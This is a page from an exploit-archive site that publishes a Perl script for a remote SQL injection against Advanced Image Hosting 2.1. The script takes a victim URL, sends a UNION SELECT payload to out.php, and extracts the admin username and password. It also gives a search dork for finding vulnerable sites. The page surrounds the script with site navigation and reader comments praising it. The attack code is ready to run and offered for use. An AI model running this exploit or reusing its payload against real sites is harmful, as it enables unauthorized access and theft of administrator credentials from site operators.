Members Login

Rss Feeds

Get our latest content via RSS feeds.

Report a Vulnerability

Report a vulnerability or exploit that you have found to SecuMania.
vul[at]SecuMania.org

advertise with us

add your link here only ($10/month)

Google PageRank Checker
 

Recommended Links

Most downloaded

Latest Comments

I cant say I feel sorry for him, stupid spammer got what he deserved. We all know how it feels to op...
thanks smiley
hi webmaster,plz help me to find any information about account harvesting and traversal path attack ...
Hello Webmasters My name is Nikolai. I am making an organization for the protection internet users f...
good job you are the best . mgharba talmout :d
Hello, The reported problem has been fixed. Regards, Catalina Danila Online Rent Customer Supp...
Not Vulnerable: Luis Wang netOffice Dwins 1.3.1 visit website http://netofficedwins .sourceforge.ne...
Current version of script corrected. Security patch available to registered users in the user foru...
But i think to protect the password is not needed because it's not used in the SQL-Execute statement...
you may find that your hotfix doesnt stop the password field from having SQL injected into it. This ...

Who's Online

Total: 31
Members: 0 / Guests: 31
No members online

Packet Storm

Links

viralcoders

lzer






Astalavista.com - the hacking & security community
 Add your site here? Contact us

Visits today: 630
Visits yesterday: 871
Visits month: 8655
Visits total: 466034
Pages total: 8734884
Advanced Image Hosting (AIH) 2.1 Remote SQL Injection Exploit Print E-mail
0
Monday, 12 May 2008

Advanced Image Hosting (AIH) 2.1 Remote SQL Injection Exploit
Author: Stack-Terrorist
Date: 2008-05-12
Download: exploits , vulnerabilities , articles , Advanced Image Hosting (AIH) 2.1 Remote SQL Injection Exploit 

#!/usr/bin/perl -w
##########################################################
#                Advanced Image Host Script              #
#    Powered by: AIH <=  v2.1 - Remote SQL Inj Exploit   #
##########################################################
#  dork:Powered by: AIH v2.1
#  exploit aported password not crypted
#  exploit tatjibe password mdecrypté :d
#  mgharba :d:d:d:d
########################################
#[*] Founded by : Stack-Terrorist [v40]
#[*] Contact: Ev!L
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & All muslims HaCkeRs  :)
########################################
#----------------------------------------------------------------------------#
########################################
# * TITLE:          PerlSploit Class
# * REQUIREMENTS:   PHP 4 / PHP 5
# * VERSION:        v.1
# * LICENSE:        GNU General Public License
# * ORIGINAL URL:   http://www.v4-Team/v4.txt
# * FILENAME:       PerlSploitClass.pl
# *
# * CONTACT:        dj-moad@hotmail.fr (french / english / arabic / moroco Darija :d )
# * GREETZ:         Houssamix & Djekmani
# * THNX : AllaH
 ########################################
system("color a");
print "\t\t############################################################\n\n";
print "\t\t#                        Viva Islam                        #\n\n";
print "\t\t#                 Advanced Image Host Script               #\n\n";
print "\t\t#     Powered by: AIH <=  v2.1 - Remote SQL Inj Exploit    #\n\n";
print "\t\t#                 by Stack-Terrorist [v40]                 #\n\n";
print "\t\t############################################################\n\n";
########################################
#----------------------------------------------------------------------------#
########################################
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/\n" unless @ARGV;
system("color f");
########################################
#----------------------------------------------------------------------------#
########################################
#the username
$user="admin";
#the pasword 
$pass="pass";
#the tables
$tab="setting";
########################################
#----------------------------------------------------------------------------#
########################################
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
########################################
#----------------------------------------------------------------------------#
########################################
$host = $ARGV[0] . "/out.php?t=-1'/**/union/**/select/**/2,2,2,2,2,2,concat(CHAR(60,117,115,101,114,62),".$user.",CHAR(60,98,115,62,60,98,107,62),CHAR(60,112,97,115,115,62),".$pass.",CHAR(60,98,107,62,60,98,115,62)),2,2,2,2,2,2+from+".$tab."/*";
########################################
#----------------------------------------------------------------------------#
########################################
$res = $b->request(HTTP::Request->new(GET=>$host));
$answer = $res->content;
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~ /<user>(.*?)<bs><bk>/){
        print "\nBrought to you by v4-team.com...\n";
        print "\n[+] Admin User : $1";
}
########################################
#----------------------------------------------------------------------------#
########################################
if ($answer =~ /<pass>(.*?)<bk><bs>/){print "\n[+] Admin password : $1\n\n";
print "\t\t#   Exploit has ben aported user and password    #\n\n";}
########################################
#----------------------------------------------------------------------------#
########################################
else{print "\n[-] Exploit Failed...\n";}
########################################
#----------------------------------------------------------------------------#
########################################
#----------------------------------------------------------------------------#
#              exploit exploited by Stack-Terrorist                              #
#----------------------------------------------------------------------------#
########################################
#----------------------------------------------------------------------------#
########################################
 

Set as favorite
Bookmark
Email This
Hits: 2559
Comments (2)add
viva islam hackers
written by Mr.khalek , June 18, 2008
good job you are the best .
mgharba talmout :d
report abuse
vote down
vote up
Votes: +0
Advanced Image Hosting
written by sam , August 05, 2008
thanks
smilies/smiley.gif
report abuse
vote down
vote up
Votes: -1
Write comment
quote
bold
italicize
underline
strike
url
image
quote
quote
smile
wink
laugh
grin
angry
sad
shocked
cool
tongue
kiss
cry
smaller | bigger

security image
Write the displayed characters


busy
 
< Prev   Next >
[ Back ]

Polls

How do you rate the SecuMania Security Portal?
 

Latest exploits

Latest vulnerabilities

Security

Spam

Viruses/Malware

Software/Programming

Linux

Microsoft

Technology

web design company
Warning: file_put_contents() failed to open stream: Permission denied in /home/inowweb/public_html/secumania.org/index.php on line 741